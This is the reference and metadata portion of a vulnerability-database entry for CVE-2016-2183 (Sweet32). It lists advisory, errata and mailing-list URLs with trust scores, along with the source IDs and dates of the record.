url:	http://www.debian.org/security/2016/dsa-3673	Trust: 1.1
url:	https://security.gentoo.org/glsa/201612-16	Trust: 1.1
url:	https://security.gentoo.org/glsa/201707-01	Trust: 1.1
url:	http://rhn.redhat.com/errata/rhsa-2017-0336.html	Trust: 1.1
url:	http://rhn.redhat.com/errata/rhsa-2017-0337.html	Trust: 1.1
url:	http://rhn.redhat.com/errata/rhsa-2017-0338.html	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2017:2708	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2017:2709	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2017:3113	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2017:3114	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2017:3239	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2017:3240	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2019:1245	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2019:2859	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2020:0451	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00022.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00024.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00005.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00011.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00012.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00013.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2017-01/msg00068.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00023.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00028.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00076.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00010.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00011.html	Trust: 1.1
url:	http://www.ubuntu.com/usn/usn-3087-1	Trust: 1.1
url:	http://www.ubuntu.com/usn/usn-3087-2	Trust: 1.1
url:	http://www.ubuntu.com/usn/usn-3179-1	Trust: 1.1
url:	http://www.ubuntu.com/usn/usn-3194-1	Trust: 1.1
url:	http://www.ubuntu.com/usn/usn-3198-1	Trust: 1.1
url:	http://www.ubuntu.com/usn/usn-3270-1	Trust: 1.1
url:	http://www.ubuntu.com/usn/usn-3372-1	Trust: 1.1
url:	https://www.ietf.org/mail-archive/web/tls/current/msg04560.html	Trust: 1.1
url:	http://packetstormsecurity.com/files/142756/ibm-informix-dynamic-server-dll-injection-code-execution.html	Trust: 1.1
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21991482	Trust: 1.1
url:	http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170322-01-openssl-en	Trust: 1.1
url:	http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html	Trust: 1.1
url:	http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html	Trust: 1.1
url:	http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html	Trust: 1.1
url:	http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html	Trust: 1.1
url:	http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html	Trust: 1.1
url:	http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html	Trust: 1.1
url:	http://www.splunk.com/view/sp-caaapsv	Trust: 1.1
url:	http://www.splunk.com/view/sp-caaapue	Trust: 1.1
url:	https://blog.cryptographyengineering.com/2016/08/24/attack-of-week-64-bit-ciphers-in-tls/	Trust: 1.1
url:	https://bto.bluecoat.com/security-advisory/sa133	Trust: 1.1
url:	https://bugzilla.redhat.com/show_bug.cgi?id=1369383	Trust: 1.1
url:	https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf	Trust: 1.1
url:	https://github.com/ssllabs/ssllabs-scan/issues/387#issuecomment-242514633	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05302448	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05309984	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05323116	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05349499	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05356388	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05369403	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05369415	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05385680	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390849	Trust: 1.1
url:	https://ics-cert.us-cert.gov/advisories/icsma-18-058-02	Trust: 1.1
url:	https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312	Trust: 1.1
url:	https://nakedsecurity.sophos.com/2016/08/25/anatomy-of-a-cryptographic-collision-the-sweet32-attack/	Trust: 1.1
url:	https://nodejs.org/en/blog/vulnerability/september-2016-security-releases/	Trust: 1.1
url:	https://security.netapp.com/advisory/ntap-20160915-0001/	Trust: 1.1
url:	https://security.netapp.com/advisory/ntap-20170119-0001/	Trust: 1.1
url:	https://softwaresupport.softwaregrp.com/document/-/facetsearch/document/km03158613	Trust: 1.1
url:	https://softwaresupport.softwaregrp.com/document/-/facetsearch/document/km03286178	Trust: 1.1
url:	https://support.f5.com/csp/article/k13167034	Trust: 1.1
url:	https://wiki.opendaylight.org/view/security_advisories	Trust: 1.1
url:	https://www.arista.com/en/support/advisories-notices/security-advisories/1749-security-advisory-24	Trust: 1.1
url:	https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-17-0008	Trust: 1.1
url:	https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2016/august/new-practical-attacks-on-64-bit-block-ciphers-3des-blowfish/	Trust: 1.1
url:	https://www.oracle.com/security-alerts/cpuapr2020.html	Trust: 1.1
url:	https://www.oracle.com/security-alerts/cpujan2020.html	Trust: 1.1
url:	https://www.oracle.com/security-alerts/cpujul2020.html	Trust: 1.1
url:	https://www.oracle.com/security-alerts/cpuoct2020.html	Trust: 1.1
url:	https://www.oracle.com/security-alerts/cpuoct2021.html	Trust: 1.1
url:	https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html	Trust: 1.1
url:	https://www.sigsac.org/ccs/ccs2016/accepted-papers/	Trust: 1.1
url:	https://www.tenable.com/security/tns-2016-16	Trust: 1.1
url:	https://www.tenable.com/security/tns-2016-20	Trust: 1.1
url:	https://www.tenable.com/security/tns-2016-21	Trust: 1.1
url:	https://www.tenable.com/security/tns-2017-09	Trust: 1.1
url:	https://www.teskalabs.com/blog/teskalabs-bulletin-160826-seacat-sweet32-issue	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00023.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00031.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00021.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00029.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00003.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00032.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2018-02/msg00032.html	Trust: 1.1
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05390722	Trust: 1.0
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10186	Trust: 1.0
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05302448	Trust: 1.0
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-hpesbgn03765en_us	Trust: 1.0
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10310	Trust: 1.0
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05385680	Trust: 1.0
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10171	Trust: 1.0
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-hpesbux03725en_us	Trust: 1.0
url:	https://www.vicarius.io/vsociety/posts/cve-2016-2183-detection-sweet32-vulnerability	Trust: 1.0
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05369415	Trust: 1.0
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05390849	Trust: 1.0
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05369403	Trust: 1.0
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10215	Trust: 1.0
url:	https://www.vicarius.io/vsociety/posts/cve-2016-2183-mitigate-sweet32-vulnerability	Trust: 1.0
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10759	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2016-2183	Trust: 0.9
url:	https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl	Trust: 0.4
url:	https://access.redhat.com/security/team/contact/	Trust: 0.4
url:	https://www.redhat.com/mailman/listinfo/rhsa-announce	Trust: 0.4
url:	https://bugzilla.redhat.com/):	Trust: 0.4
url:	https://github.com/python/cpython/commit/03d13c0cbfe912eb0f9b9a02987b9e569f25fe19	Trust: 0.3
url:	https://github.com/python/cpython/commit/fa53dbdec818b0f2a0e22ca12a49d83ec948fc91	Trust: 0.3
url:	https://www.openssl.org/news/changelog.html#x1	Trust: 0.3
url:	http://openssl.org/	Trust: 0.3
url:	https://kb.netapp.com/support/index?page=content&id=9010102&actp=rss	Trust: 0.3
url:	https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05369415	Trust: 0.3
url:	https://python-security.readthedocs.io/vuln/cve-2016-2183_sweet32_attack_des_3des.html	Trust: 0.3
url:	https://support.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbgn03765en_us	Trust: 0.3
url:	https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05323116	Trust: 0.3
url:	http://aix.software.ibm.com/aix/efixes/security/openssl_advisory21.asc	Trust: 0.3
url:	https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-worklight-and-ibm-mobilefirst-platform-foundation-2/	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=isg3t1024394	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=isg3t1024401	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=isg3t1024648	Trust: 0.3
url:	https://github.com/python/cpython/commit/d988f429fe43808345812ef63dfa8da170c61871	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=nas8n1021643	Trust: 0.3
url:	http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html	Trust: 0.3
url:	http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html	Trust: 0.3
url:	https://kc.mcafee.com/resources/sites/mcafee/content/live/product_documentation/27000/pd27128/en_us/meg_7_6_406_3402_103_release_notes_en_us.pdf	Trust: 0.3
url:	https://www.pexip.com/sites/pexip/files/pexip_security_bulletin_2016-10-07.pdf	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21991896	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009585	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009586	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=ssg1s1009648	Trust: 0.3
url:	https://www-01.ibm.com/support/docview.wss?uid=swg21985392	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21991724	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21991894	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21992427	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21992681	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21992898	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21993061	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21993601	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21993856	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21993875	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21994375	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21994927	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21995057	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21995129	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21995392	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21995393	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21995658	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21995691	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21995886	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21995922	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21997194	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg22000587	Trust: 0.3
url:	https://access.redhat.com/articles/11258	Trust: 0.3
url:	https://access.redhat.com/security/team/key/	Trust: 0.3
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3259	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3253	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2016-5546	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2016-5549	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2016-5547	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3241	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3231	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2016-5552	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3252	Trust: 0.2
url:	https://access.redhat.com/security/updates/classification/#moderate	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2016-5548	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2016-2178	Trust: 0.2
url:	https://access.redhat.com/security/updates/classification/#important	Trust: 0.2
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10759	Trust: 0.1
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05302448	Trust: 0.1
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05369403	Trust: 0.1
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05369415	Trust: 0.1
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05385680	Trust: 0.1
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05390722	Trust: 0.1
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05390849	Trust: 0.1
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-hpesbgn03765en_us	Trust: 0.1
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-hpesbux03725en_us	Trust: 0.1
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10171	Trust: 0.1
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10186	Trust: 0.1
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10197	Trust: 0.1
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10215	Trust: 0.1
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10310	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-3598	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-5556	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2017-3231	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-3422	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-5542	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-3426	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-5542	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-3449	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-0363	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-0264	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-3449	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-5573	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-5548	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-0376	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-0376	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-5573	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-5549	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-3443	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2017-3253	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-0687	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-3443	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-0363	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2017-3252	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-5556	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-3427	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-5554	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-5547	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-0686	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2017-3259	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-5552	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-3422	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-3426	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-0686	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-5597	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-3511	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2017-3272	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-5554	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-3427	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2017-3241	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-3511	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-0687	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-5546	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-0264	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-3598	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2017-3261	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2016-5597	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2017-3289	Trust: 0.1
url:	http://www.w3.org/2001/xmlschema-instance"	Trust: 0.1
url:	http://www.w3.org/2001/xmlschema"	Trust: 0.1
url:	http://schemas.xmlsoap.org/soap/envelope/"	Trust: 0.1
url:	http://schemas.xmlsoap.org/soap/encoding/">	Trust: 0.1
url:	http://win-pf2vmdt4mvo:8080/openadmin";#the	Trust: 0.1
url:	http://servername:port/location.	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-1092	Trust: 0.1
url:	http://www-01.ibm.com/support/docview.wss?uid=swg22002897	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-6302	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-2181	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-2182	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-6303	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-2179	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-6304	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-2177	Trust: 0.1
url:	https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/	Trust: 0.1
url:	https://www.debian.org/security/faq	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-6306	Trust: 0.1
url:	https://www.debian.org/security/	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-2180	Trust: 0.1
url:	http://www.hpe.com/support/security_bulletin_archive	Trust: 0.1
url:	https://www.hpe.com/info/report-security-vulnerability	Trust: 0.1
url:	http://www.hpe.com/support/subscriber_choice	Trust: 0.1
url:	https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05349499	Trust: 0.1
url:	https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499	Trust: 0.1
url:	https://developer.ibm.com/javasdk/support/security-vulnerabilities/	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2015-8011	Trust: 0.1
url:	https://access.redhat.com/errata/rhsa-2021:0308	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2021-3344	Trust: 0.1
url:	https://access.redhat.com/errata/rhba-2021:0309	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2015-8011	Trust: 0.1
url:	https://docs.openshift.com/container-platform/4.6/updating/updating-cluster	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2020-14382	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2021-20198	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2021-20198	Trust: 0.1
url:	https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2021-3344	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2020-14382	Trust: 0.1
url:	https://issues.jboss.org/):	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2015-3185	Trust: 0.1
url:	https://access.redhat.com/documentation/en/red-hat-jboss-core-services/	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2015-3185	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2017-9788	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-9788	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-8328	Trust: 0.1
url:	https://security.gentoo.org/	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2183	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3289	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3260	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3260	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3253	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3262	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-5546	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-5552	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3289	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3261	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3261	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3231	Trust: 0.1
url:	http://creativecommons.org/licenses/by-sa/2.5	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3241	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3259	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3262	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3272	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-8328	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-5548	Trust: 0.1
url:	http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.ht=	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-5547	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-5549	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3252	Trust: 0.1
url:	https://bugs.gentoo.org.	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3272	Trust: 0.1

CREDITS

Red Hat

Trust: 0.4

sources: PACKETSTORM: 142452 // PACKETSTORM: 141555 // PACKETSTORM: 161320 // PACKETSTORM: 144135

SOURCES

db:	VULHUB	id:	VHN-91002
db:	BID	id:	92630
db:	PACKETSTORM	id:	142452
db:	PACKETSTORM	id:	142756
db:	PACKETSTORM	id:	138817
db:	PACKETSTORM	id:	140084
db:	PACKETSTORM	id:	138889
db:	PACKETSTORM	id:	141555
db:	PACKETSTORM	id:	161320
db:	PACKETSTORM	id:	144135
db:	PACKETSTORM	id:	140725
db:	NVD	id:	CVE-2016-2183

LAST UPDATE DATE

2025-04-28T20:43:19.290000+00:00

SOURCES UPDATE DATE

db:	VULHUB	id:	VHN-91002	date:	2023-02-12T00:00:00
db:	BID	id:	92630	date:	2019-02-14T11:00:00
db:	NVD	id:	CVE-2016-2183	date:	2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:	VULHUB	id:	VHN-91002	date:	2016-09-01T00:00:00
db:	BID	id:	92630	date:	2016-08-24T00:00:00
db:	PACKETSTORM	id:	142452	date:	2017-05-10T14:06:16
db:	PACKETSTORM	id:	142756	date:	2017-05-31T10:22:22
db:	PACKETSTORM	id:	138817	date:	2016-09-22T22:22:00
db:	PACKETSTORM	id:	140084	date:	2016-12-08T23:45:55
db:	PACKETSTORM	id:	138889	date:	2016-09-28T23:24:00
db:	PACKETSTORM	id:	141555	date:	2017-03-09T17:02:00
db:	PACKETSTORM	id:	161320	date:	2021-02-08T16:28:20
db:	PACKETSTORM	id:	144135	date:	2017-09-14T19:50:50
db:	PACKETSTORM	id:	140725	date:	2017-01-25T21:55:38
db:	NVD	id:	CVE-2016-2183	date:	2016-09-01T00:59:00.137